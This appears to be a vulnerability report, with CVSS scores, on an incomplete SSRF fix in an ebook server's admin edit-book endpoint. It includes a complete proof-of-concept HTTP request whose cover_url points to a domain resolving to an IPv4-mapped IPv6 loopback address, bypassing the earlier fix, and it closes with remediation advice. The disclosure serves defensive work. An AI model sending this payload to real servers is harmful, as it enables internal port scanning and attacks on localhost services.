9.9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
37.1%
The fix for my previous report (CVE-2022-0767) is still incomplete and could be bypassed via IPV4/IPV4 embedding :
ssrf-ipv4_ipv6.etclab.top
will resolve to 0:0:0:0:0:ffff:127.0.0.1
POST /admin/book/1 HTTP/1.1
Host: 127.0.0.1:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------14432334242120559709379867589
Content-Length: 2321
Origin: null
Connection: close
Cookie: session=.eJwljjlqBDEQAP-i2EEf6lZrPzNIfWBjsGFmNzL-uwccVlFB_bSjzrze2-N5vvKtHR_RHs0qZjJR96yaZUwgy0EsCrqJgS60QSTLhDcPBhZzWdRhqMZcIIjqmLHhLntpem1RFew8dUpX9MQ50Rg3aFQAWxF57lyc7R55XXn-3-CNfp11PL8_8-sWPty3EoGbB2YOhF41KPfOSBq9gpRitt8_T24_Fw.YhhiGw.-3BW6pW_7-ch1-BZOwoScsgrPTY; remember_token=1|c03586bceafcfcc3553cf6f7687a8e5568f28f153173472c83b178b3c748a61ffb39953601a75eb9dcc9c91a8fcd3a710feecab8e93530f1781b5734183b391e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="csrf_token"
ImM3Y2NiNjIyMGM4Y2QxZWU3MTA0ZmY3MmViYmVkZTI3NGZkMjYyZDki.YhhiGg.MmwyZBGR24IaeVpO-gVRdjx2vk0
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="book_title"
A Christmas Carol in Prose; Being a Ghost Story of Christmas
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="author_name"
Charles Dickens
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="description"
<p>Test</p>
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="tags"
Christmas stories, Ghost stories, London (England) -- Fiction, Misers -- Fiction, Poor families -- Fiction, Scrooge; Ebenezer (Fictitious character) -- Fiction, Sick children -- Fiction
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="series"
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="series_index"
1.0
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="rating"
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="cover_url"
http://ssrf-ipv4_ipv6.etclab.top/
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="btn-upload-cover"; filename=""
Content-Type: application/octet-stream
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="pubdate"
2004-08-11
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="publisher"
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="languages"
English
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="btn-upload-format"; filename=""
Content-Type: application/octet-stream
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="detail_view"
on
-----------------------------14432334242120559709379867589--
This vulnerability is capable of port scanning and even may execute some actions on the victim’s side in case there are sensitive services on localhost.
I still strongly recommend using the Advocate library instead of requests, it will protect functionality download the remote files from SSRF attacks.
for example, even with the fix of this report, you are still vulnerable to DNS-rebinding, and using SSRF Protected libraries like Advocate will solve this problem.
9.9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
37.1%